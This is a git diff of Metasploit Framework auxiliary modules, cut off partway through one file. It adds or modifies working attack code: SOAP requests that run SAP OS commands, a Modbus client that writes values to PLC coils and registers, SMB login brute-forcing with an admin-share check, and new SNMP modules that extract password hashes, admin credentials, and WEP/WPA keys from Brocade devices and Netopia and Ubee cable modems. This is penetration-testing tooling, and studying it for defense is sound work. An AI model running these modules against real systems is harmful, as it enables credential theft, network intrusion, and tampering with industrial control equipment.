diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb
index bab5a4f4c7..33c040c8ac 100644
--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec.rb
@@ -73,16 +73,20 @@ class Metasploit4 < Msf::Auxiliary
     print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+        'uri' => '/sap/bc/soap/rfc',
         'method' => 'POST',
         'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+        'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
         'ctype' => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'headers' =>{
+        'headers' => {
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
-          }
-        })
+        },
+        'vars_get' => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
+        }
+      })
       if res and res.code != 500 and res.code != 200
         # to do - implement error handlers for each status code, 404, 301, etc.
         print_error("[SAP] #{ip}:#{rport} - something went wrong!")
diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
index 977001c395..7b2aad3ebe 100644
--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec.rb
@@ -73,14 +73,18 @@ class Metasploit4 < Msf::Auxiliary
     print_status("[SAP] #{ip}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+        'uri' => '/sap/bc/soap/rfc',
         'method' => 'POST',
         'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+        'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
         'ctype' => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
         'headers' =>{
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+        },
+        'vars_get' => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
         }
       })
       if res and res.code != 500 and res.code != 200
diff --git a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb
index 0677878b96..db2a26bf6e 100644
--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_system_info.rb
@@ -89,14 +89,18 @@ class Metasploit4 < Msf::Auxiliary
     print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_SYSTEM_INFO request")
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+        'uri' => '/sap/bc/soap/rfc',
         'method' => 'POST',
         'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+        'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
         'ctype' => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
         'headers' =>{
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+        },
+        'vars_get' => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
         }
       })
       if res and res.code != 500 and res.code != 200
diff --git a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb
index d02719355c..4695780832 100644
--- a/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb
@@ -64,14 +64,18 @@ class Metasploit4 < Msf::Auxiliary
 
     begin
       res = send_request_cgi({
-        'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+        'uri' => '/sap/bc/soap/rfc',
         'method' => 'POST',
         'data' => data,
-        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+        'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",
         'ctype' => 'text/xml; charset=UTF-8',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-        'headers' =>{
+        'headers' => {
           'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+        },
+        'vars_get' => {
+          'sap-client'    => datastore['CLIENT'],
+          'sap-language'  => 'EN'
         }
       })
       if res and res.code == 200
diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb
index bd4f6ab6fe..ec954cc188 100644
--- a/modules/auxiliary/scanner/scada/modbusclient.rb
+++ b/modules/auxiliary/scanner/scada/modbusclient.rb
@@ -8,74 +8,200 @@ require 'msf/core'
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Exploit::Remote::Tcp
-  include Msf::Auxiliary::Fuzzer
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Modbus Client Utility',
-      'Description'    => %q{
-        This module sends a command (0x06, write to one register) to a Modbus endpoint.
-        You can change port, IP, register to write and data to write, as well as unit-id.
-
-        Modbus is a clear text protocol used in common SCADA systems, developed
-        originally as a serial-line (RS232) async protocol. It is later transformed
-        to IP, which is called ModbusTCP.
-
-        There are a handful of functions which are possible to do, but this
-        client has only implemented the function "write value to register" (\x48).
+      'Name'          => 'Modbus Client Utility',
+      'Description'   => %q{
+        This module allows reading and writing data to a PLC using the Modbus protocol.
+        This module is based on the 'modiconstop.rb' Basecamp module from DigitalBond,
+        as well as the mbtget perl script.
       },
-      'Author'         => [ 'EsMnemon <esm[at]mnemonic.no>' ],
-      'References'     =>
+      'Author'         =>
         [
-          ['URL', 'http://www.saia-pcd.com/en/products/plc/pcd-overview/Pages/pcd1-m2.aspx']
+          'EsMnemon <esm[at]mnemonic.no>', # original write-only module
+          'Arnaud SOULLIE  <arnaud.soullie[at]solucom.fr>' # new code that allows read/write
         ],
       'License'        => MSF_LICENSE,
-      'DisclosureDate' => 'Nov 1 2011'
-    ))
+      'Actions'        =>
+        [
+          ['READ_COIL', { 'Description' => 'Read one bit from a coil' } ],
+          ['WRITE_COIL', { 'Description' => 'Write one bit to a coil' } ],
+          ['READ_REGISTER', { 'Description' => 'Read one word from a register' } ],
+          ['WRITE_REGISTER', { 'Description' => 'Write one word to a register' } ]
+        ],
+      'DefaultAction' => 'READ_REGISTER'
+      ))
 
-    register_options([
-      Opt::RPORT(502),
-      OptInt.new('UNIT_ID', [true, "ModBus Unit Identifier ", 1]),
-      OptInt.new('MODVALUE', [true, "ModBus value to write (data) ", 2]),
-      OptInt.new('REGIS', [true, "ModBus Register definition", 1002])
-    ], self.class)
+    register_options(
+      [
+        Opt::RPORT(502),
+        OptInt.new('DATA', [false, "Data to write (WRITE_COIL and WRITE_REGISTER modes only)"]),
+        OptInt.new('DATA_ADDRESS', [true, "Modbus data address"]),
+        OptInt.new('UNIT_NUMBER', [false, "Modbus unit number", 1]),
+      ], self.class)
+
+  end
+
+  # a wrapper just to be sure we increment the counter
+  def send_frame(payload)
+    sock.put(payload)
+    @modbus_counter += 1
+    r = sock.get(sock.def_read_timeout)
+    return r
+  end
+
+  def make_payload(payload)
+    packet_data = [@modbus_counter].pack("n")
+    packet_data += "\x00\x00\x00" #dunno what these are
+    packet_data += [payload.size].pack("c") # size byte
+    packet_data += payload
+
+    packet_data
+  end
+
+  def make_read_payload
+    payload = [datastore['UNIT_NUMBER']].pack("c")
+    payload += [@function_code].pack("c")
+    payload += [datastore['DATA_ADDRESS']].pack("n")
+    payload += [1].pack("n")
+
+    packet_data = make_payload(payload)
+
+    packet_data
+  end
+
+  def make_write_coil_payload(data)
+    payload = [datastore['UNIT_NUMBER']].pack("c")
+    payload += [@function_code].pack("c")
+    payload += [datastore['DATA_ADDRESS']].pack("n")
+    payload += [data].pack("c")
+    payload += "\x00"
+
+    packet_data = make_payload(payload)
+
+    packet_data
+  end
+
+  def make_write_register_payload(data)
+    payload = [datastore['UNIT_NUMBER']].pack("c")
+    payload += [@function_code].pack("c")
+    payload += [datastore['DATA_ADDRESS']].pack("n")
+    payload += [data].pack("n")
+
+    packet_data = make_payload(payload)
+
+    packet_data
+  end
+
+  def handle_error(response)
+    case response.reverse.unpack("c")[0].to_i
+    when 1
+      print_error("Error : ILLEGAL FUNCTION")
+    when 2
+      print_error("Error : ILLEGAL DATA ADDRESS")
+    when 3
+      print_error("Error : ILLEGAL DATA VALUE")
+    when 4
+      print_error("Error : SLAVE DEVICE FAILURE")
+    when 6
+      print_error("Error : SLAVE DEVICE BUSY")
+    else
+      print_error("Unknown error")
+    end
+    return
+  end
+
+  def read_coil
+    @function_code = 0x1
+    print_status("Sending READ COIL...")
+    response = send_frame(make_read_payload)
+    if response.nil?
+      print_error("No answer for the READ COIL")
+      return
+    elsif response.unpack("C*")[7] == (0x80 | @function_code)
+      handle_error(response)
+    elsif response.unpack("C*")[7] == @function_code
+      value = response[9].unpack("c")[0]
+      print_good("Coil value at address #{datastore['DATA_ADDRESS']} : #{value}")
+    else
+      print_error("Unknown answer")
+    end
+  end
+
+  def read_register
+    @function_code = 3
+    print_status("Sending READ REGISTER...")
+    response = send_frame(make_read_payload)
+    if response.nil?
+      print_error("No answer for the READ REGISTER")
+    elsif response.unpack("C*")[7] == (0x80 | @function_code)
+      handle_error(response)
+    elsif response.unpack("C*")[7] == @function_code
+      value = response[9..10].unpack("n")[0]
+      print_good("Register value at address #{datastore['DATA_ADDRESS']} : #{value}")
+    else
+      print_error("Unknown answer")
+    end
+  end
+
+  def write_coil
+    @function_code = 5
+    if datastore['DATA'] == 0
+      data = 0
+    elsif datastore['DATA'] == 1
+      data = 255
+    else
+      print_error("Data value must be 0 or 1 in WRITE_COIL mode")
+      return
+    end
+    print_status("Sending WRITE COIL...")
+    response = send_frame(make_write_coil_payload(data))
+    if response.nil?
+      print_error("No answer for the WRITE COIL")
+    elsif response.unpack("C*")[7] == (0x80 | @function_code)
+      handle_error(response)
+    elsif response.unpack("C*")[7] == @function_code
+      print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}")
+    else
+      print_error("Unknown answer")
+    end
+  end
+
+  def write_register
+    @function_code = 6
+    if datastore['DATA'] < 0 || datastore['DATA'] > 65535
+      print_error("Data to write must be an integer between 0 and 65535 in WRITE_REGISTER mode")
+      return
+    end
+    print_status("Sending WRITE REGISTER...")
+    response = send_frame(make_write_register_payload(datastore['DATA']))
+    if response.nil?
+      print_error("No answer for the WRITE REGISTER")
+    elsif response.unpack("C*")[7] == (0x80 | @function_code)
+      handle_error(response)
+    elsif response.unpack("C*")[7] == @function_code
+      print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}")
+    else
+      print_error("Unknown answer")
+    end
   end
 
   def run
-    trans_id ="\x21\x00"
-    proto_id ="\x00\x00"
-    len      ="\x00\x06"
-    func_id  ="\x06"
-
-    #For debug:    MODVALUE=19276  REGIS=18762, UNIT_ID=71
-    #trans_id="\x41\x42"
-    #proto_id="\x43\x44"
-    #len="\x45\x46"
-    #func_id="\x48"
-
-    sploit  = trans_id
-    sploit += proto_id
-    sploit += len
-    sploit += [datastore['UNIT_ID']].pack("C")
-    sploit += func_id
-    sploit += [datastore['REGIS']].pack("S").reverse
-    sploit += [datastore['MODVALUE']].pack("S").reverse
-
-    connect()
-    sock.put(sploit)
-    sock.get_once
-    disconnect()
+    @modbus_counter = 0x0000 # used for modbus frames
+    connect
+    case action.name
+    when "READ_COIL"
+      read_coil
+    when "READ_REGISTER"
+      read_register
+    when "WRITE_COIL"
+      write_coil
+    when "WRITE_REGISTER"
+      write_register
+    else
+      print_error("Invalid ACTION")
+    end
+    disconnect
   end
 end
-
-
-=begin
-MODBUS:  10 00 00 00 00 06 01 06 03 ea 00 02
-tested on a SAIA PCD1.M2
-scapy - even with source-IP
-       sploit="\x21\x00\x00\x00\x00\x06\x01\x06\x03\xea\x00\x02"
-       ip=IP(dst="172.16.10.10",src="172.16.10.155",proto=6,flags=2)
-       tcp=TCP(dport=509)
-       send(ip/tcp/sploit)
-
-=end
diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb
index 0d7daddb69..6e5637e73e 100644
--- a/modules/auxiliary/scanner/smb/smb_login.rb
+++ b/modules/auxiliary/scanner/smb/smb_login.rb
@@ -31,8 +31,10 @@ class Metasploit3 < Msf::Auxiliary
       },
       'Author'         =>
         [
-          'tebo <tebo [at] attackresearch [dot] com>', # Original
-          'Ben Campbell' # Refactoring
+          'tebo <tebo[at]attackresearch.com>', # Original
+          'Ben Campbell', # Refactoring
+          'Brandon McCann "zeknox" <bmccann[at]accuvant.com>', # admin check
+          'Tom Sellers <tom[at]fadedcode.net>' # admin check/bug fix
         ],
       'References'     =>
         [
@@ -69,6 +71,7 @@ class Metasploit3 < Msf::Auxiliary
         OptString.new('SMBPass', [ false, "SMB Password" ]),
         OptString.new('SMBUser', [ false, "SMB Username" ]),
         OptString.new('SMBDomain', [ false, "SMB Domain", '']),
+        OptBool.new('CHECK_ADMIN', [ false, "Check for Admin rights", false]),
         OptBool.new('PRESERVE_DOMAINS', [ false, "Respect a username that contains a domain name.", true]),
         OptBool.new('RECORD_GUEST', [ false, "Record guest-privileged random logins to the database", false])
       ], self.class)
@@ -124,12 +127,31 @@ class Metasploit3 < Msf::Auxiliary
       # Windows SMB will return an error code during Session Setup, but nix Samba requires a Tree Connect:
       simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
       status_code = 'STATUS_SUCCESS'
+
+      if datastore['CHECK_ADMIN']
+        status_code = :not_admin
+        # Drop the existing connection to IPC$ in order to connect to admin$
+        simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$")
+        begin
+          simple.connect("\\\\#{datastore['RHOST']}\\admin$")
+          status_code = :admin_access
+          simple.disconnect("\\\\#{datastore['RHOST']}\\admin$")
+        rescue
+          status_code = :not_admin
+        ensure
+          begin
+            simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
+          rescue ::Rex::Proto::SMB::Exceptions::NoReply
+          end
+        end
+      end
+
     rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
       status_code = e.get_error(e.error_code)
     rescue ::Rex::Proto::SMB::Exceptions::LoginError => e
       status_code = e.error_reason
     rescue ::Rex::Proto::SMB::Exceptions::InvalidWordCount => e
-      status_code = e.error_reason
+      status_code = e.get_error(e.error_code)
     rescue ::Rex::Proto::SMB::Exceptions::NoReply
     ensure
       disconnect()
@@ -187,7 +209,16 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def valid_credentials?(status)
-    return (status == "STATUS_SUCCESS" || @correct_credentials_status_codes.include?(status))
+
+    case status
+    when 'STATUS_SUCCESS', :admin_access, :not_admin
+      return true
+    when *@correct_credentials_status_codes
+      return true
+    else
+      return false
+    end
+
   end
 
   def try_user_pass(domain, user, pass)
@@ -214,7 +245,7 @@ class Metasploit3 < Msf::Auxiliary
     output_message << " (#{smb_peer_os}) #{user} : #{pass} [#{status}]".gsub('%', '%%')
 
     case status
-    when 'STATUS_SUCCESS'
+    when 'STATUS_SUCCESS', :admin_access, :not_admin
       # Auth user indicates if the login was as a guest or not
       if(simple.client.auth_user)
         print_good(output_message % "SUCCESSFUL LOGIN")
@@ -275,7 +306,7 @@ class Metasploit3 < Msf::Auxiliary
   def report_creds(domain,user,pass,active)
     login_name = ""
 
-    if accepts_bogus_domains?(user,pass,rhost)
+    if accepts_bogus_domains?(user,pass,rhost) || domain.blank?
       login_name = user
     else
       login_name = "#{domain}\\#{user}"
diff --git a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb
new file mode 100644
index 0000000000..92bca9cb55
--- /dev/null
+++ b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb
@@ -0,0 +1,74 @@
+#
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::SNMPClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'        => 'Brocade Password Hash Enumeration',
+      'Description' => %q{
+        This module extracts password hashes from certain Brocade load
+        balancer devices.
+      },
+      'References'  =>
+        [
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ]
+        ],
+      'Author'      => ['Deral "PercentX" Heiland'],
+      'License'     => MSF_LICENSE
+    )
+
+  end
+
+  def run_host(ip)
+    begin
+      snmp = connect_snmp
+
+      if snmp.get_value('sysDescr.0') =~ /Brocade/
+
+        @users = []
+        snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.1") do |row|
+          row.each { |val| @users << val.value.to_s }
+        end
+
+        @hashes = []
+        snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.2") do |row|
+          row.each { |val| @hashes << val.value.to_s }
+        end
+
+        print_good("#{ip} - Found user and password hashes:")
+        end
+
+        credinfo = ""
+        @users.each_index do |i|
+        credinfo << "#{@users[i]}:#{@hashes[i]}" << "\n"
+        print_good("#{@users[i]}:#{@hashes[i]}")
+        end
+
+
+     #Woot we got loot.
+     loot_name     = "brocade.hashes"
+     loot_type     = "text/plain"
+     loot_filename = "brocade_hashes.txt"
+     loot_desc     = "Brodace username and password hashes"
+     p = store_loot(loot_name, loot_type, datastore['RHOST'], credinfo , loot_filename, loot_desc)
+
+     print_status("Credentials saved: #{p}")
+     rescue ::SNMP::UnsupportedVersion
+     rescue ::SNMP::RequestTimeout
+     rescue ::Interrupt
+       raise $!
+     rescue ::Exception => e
+       print_error("#{ip} - Error: #{e.class} #{e}")
+     disconnect_snmp
+     end
+  end
+end
diff --git a/modules/auxiliary/scanner/snmp/netopia_enum.rb b/modules/auxiliary/scanner/snmp/netopia_enum.rb
new file mode 100644
index 0000000000..07a4840766
--- /dev/null
+++ b/modules/auxiliary/scanner/snmp/netopia_enum.rb
@@ -0,0 +1,102 @@
+#
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::SNMPClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'        => 'Netopia 3347 Cable Modem Wifi Enumeration',
+      'Description' => %q{
+        This module extracts WEP keys and WPA preshared keys from
+        certain Netopia cable modems.
+      },
+      'References'  =>
+        [
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ]
+        ],
+      'Author'      => ['Deral "PercentX" Heiland'],
+      'License'     => MSF_LICENSE
+    )
+
+  end
+
+  def run_host(ip)
+      output_data = {}
+    begin
+      snmp = connect_snmp
+
+      if snmp.get_value('sysDescr.0') =~ /Netopia 3347/
+
+      wifistatus = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.1.0')
+        if wifistatus == "1"
+        wifiinfo = ""
+        ssid = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.9.1.2.1')
+        print_good("#{ip}")
+        print_good("SSID: #{ssid}")
+        wifiinfo << "SSID: #{ssid}" << "\n"
+
+          wifiversion = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.9.1.4.1')
+            if wifiversion == "1"
+
+            #Wep enabled
+            elsif wifiversion == ("2"||"3")
+              wepkey1 = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.15.1.3.1')
+              print_good("WEP KEY1: #{wepkey1}")
+              wifiinfo << "WEP KEY1: #{wepkey1}" << "\n"
+              wepkey2 = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.15.1.3.2')
+              print_good("WEP KEY2: #{wepkey2}")
+              wifiinfo << "WEP KEY2: #{wepkey2}" << "\n"
+              wepkey3 = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.15.1.3.3')
+              print_good("WEP KEY3: #{wepkey3}")
+              wifiinfo << "WEP KEY3: #{wepkey3}" << "\n"
+              wepkey4 = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.15.1.3.4')
+              print_good("WEP KEY4: #{wepkey4}")
+              wifiinfo << "WEP KEY4: #{wepkey4}" << "\n"
+              actkey = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.13.0')
+              print_good("Active Wep key is Key#{actkey}")
+              wifiinfo << "Active WEP key is KEY#: #{actkey}" << "\n"
+
+            #WPA enabled
+            elsif wifiversion == "4"
+              print_line("Device is configured for WPA ")
+              wpapsk = snmp.get_value('1.3.6.1.4.1.304.1.3.1.26.1.9.1.5.1')
+              print_good("WPA PSK: #{wpapsk}")
+              wifiinfo << "WPA PSK: #{wpapsk}" << "\n"
+
+            #WPA Enterprise enabled
+            elsif wifiversion == "5"
+              print_line("Device is configured for WPA enterprise")
+              else
+              print_line("FAILED")
+            end
+
+      else
+         print_line("WIFI is not enabled")
+      end
+    end
+     #Woot we got loot.
+     loot_name     = "netopia_wifi"
+     loot_type     = "text/plain"
+     loot_filename = "netopia_wifi.txt"
+     loot_desc     = "Netopia Wifi configuration data"
+     p = store_loot(loot_name, loot_type, datastore['RHOST'], wifiinfo , loot_filename, loot_desc)
+     print_status("WIFI Data saved: #{p}")
+
+     rescue ::SNMP::UnsupportedVersion
+     rescue ::SNMP::RequestTimeout
+     rescue ::Interrupt
+       raise $!
+     rescue ::Exception => e
+       print_error("#{ip} - Error: #{e.class} #{e}")
+     disconnect_snmp
+     end
+  end
+end
diff --git a/modules/auxiliary/scanner/snmp/snmp_enum.rb b/modules/auxiliary/scanner/snmp/snmp_enum.rb
index 10019cf58d..595c6dd28c 100644
--- a/modules/auxiliary/scanner/snmp/snmp_enum.rb
+++ b/modules/auxiliary/scanner/snmp/snmp_enum.rb
@@ -946,17 +946,17 @@ class Metasploit3 < Msf::Auxiliary
 
 
     rescue SNMP::RequestTimeout
-      vprint_status("#{ip} SNMP request timeout.")
+      print_error("#{ip} SNMP request timeout.")
     rescue Rex::ConnectionError
-      print_status("#{ip} Connection refused.")
+      print_error("#{ip} Connection refused.")
     rescue SNMP::InvalidIpAddress
-      print_status("#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.")
+      print_error("#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.")
     rescue SNMP::UnsupportedVersion
-      print_status("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
+      print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
     rescue ::Interrupt
       raise $!
     rescue ::Exception => e
-      print_status("Unknown error: #{e.class} #{e}")
+      print_error("Unknown error: #{e.class} #{e}")
       elog("Unknown error: #{e.class} #{e}")
       elog("Call stack:\n#{e.backtrace.join "\n"}")
     ensure
diff --git a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb
index bacfdd15b7..be8dc52a9c 100644
--- a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb
+++ b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb
@@ -136,15 +136,15 @@ class Metasploit3 < Msf::Auxiliary
       disconnect_snmp
 
     rescue SNMP::RequestTimeout
-      vprint_status("#{ip}, SNMP request timeout.")
+      print_error("#{ip}, SNMP request timeout.")
     rescue Errno::ECONNREFUSED
-      vprint_status("#{ip}, Connection refused.")
+      print_error("#{ip}, Connection refused.")
     rescue SNMP::InvalidIpAddress
-      vprint_status("#{ip}, Invalid IP Address. Check it with 'snmpwalk tool'.")
+      print_error("#{ip}, Invalid IP Address. Check it with 'snmpwalk tool'.")
     rescue ::Interrupt
     raise $!
     rescue ::Exception => e
-      vprint_error("#{ip}, Unknown error: #{e.class} #{e}")
+      print_error("#{ip}, Unknown error: #{e.class} #{e}")
     end
   end
 end
diff --git a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb
new file mode 100644
index 0000000000..ab88d07bfb
--- /dev/null
+++ b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb
@@ -0,0 +1,159 @@
+#
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::SNMPClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize
+    super(
+      'Name'        => 'Ubee DDW3611b Cable Modem Wifi Enumeration',
+      'Description' => %q{
+        This module will extract WEP keys and WPA preshared keys from
+        certain Ubee cable modems.
+      },
+      'References'  =>
+        [
+          [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ]
+        ],
+      'Author'      => ['Deral "PercentX" Heiland'],
+      'License'     => MSF_LICENSE
+    )
+
+  end
+
+  def run_host(ip)
+      output_data = {}
+    begin
+      snmp = connect_snmp
+
+      if snmp.get_value('1.2.840.10036.2.1.1.9.12') =~ /DDW3611/
+        print_good("#{ip}")
+        wifiinfo = ""
+
+        # System user account and Password
+        username = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0')
+        print_good("Username: #{username}")
+        wifiinfo << "Username: #{username}" << "\n"
+        password = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0')
+        print_good("Password: #{password}")
+        wifiinfo << "Password: #{password}" << "\n"
+
+        wifistatus = snmp.get_value('1.3.6.1.2.1.2.2.1.8.12')
+        if wifistatus == 1
+          ssid = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.1.14.1.3.12')
+          print_good("SSID: #{ssid}")
+          wifiinfo << "SSID: #{ssid}" << "\n"
+
+          #Wifi Security Version
+          wifiversion = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.1.14.1.5.12')
+          if wifiversion == "0"
+            print_line("Open Access Wifi is Enabled")
+
+          #Wep enabled
+          elsif wifiversion == "1"
+          weptype = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.1.1.2.12')
+            if weptype == "2"
+              wepkey1 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.1')
+              key1 = "#{wepkey1}".unpack('H*')
+              print_good("WEP KEY1: #{key1}")
+              wifiinfo << "WEP KEY1: #{key1}" << "\n"
+              wepkey2 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.2')
+              key2 = "#{wepkey2}".unpack('H*')
+              print_good("WEP KEY2: #{key2}")
+              wifiinfo << "WEP KEY2: #{key2}" << "\n"
+              wepkey3 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.3')
+              key3 = "#{wepkey3}".unpack('H*')
+              print_good("WEP KEY3: #{key3}")
+              wifiinfo << "WEP KEY3: #{key3}" << "\n"
+              wepkey4 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.3.1.2.12.4')
+              key4 = "#{wepkey4}".unpack('H*')
+              print_good("WEP KEY4: #{key4}")
+              wifiinfo << "WEP KEY4: #{key4}" << "\n"
+              actkey = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.1.1.1.12')
+              print_good("Active Wep key is #{actkey}")
+              wifiinfo << "Active WEP key is KEY#: #{actkey}" << "\n"
+
+            elsif weptype == "1"
+              wepkey1 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.1')
+              key1 = "#{wepkey1}".unpack('H*')
+              print_good("WEP KEY1: #{key1}")
+              wifiinfo << "WEP KEY1: #{key1}" << "\n"
+              wepkey2 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.2')
+              key2 = "#{wepkey2}".unpack('H*')
+              print_good("WEP KEY2: #{key2}")
+              wifiinfo << "WEP KEY2: #{key2}" << "\n"
+              wepkey3 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.3')
+              key3 = "#{wepkey3}".unpack('H*')
+              print_good("WEP KEY3: #{key3}")
+              wifiinfo << "WEP KEY3: #{key3}" << "\n"
+              wepkey4 = snmp.get_value('1.3.6.1.4.1.4684.38.2.2.2.1.5.4.2.2.1.2.12.4')
+              key4 = "#{wepkey4}".unpack('H*')
+              print_good("WEP KEY4: #{key4}")
+              wifiinfo << "WEP KEY4: #{key4}" << "\n"
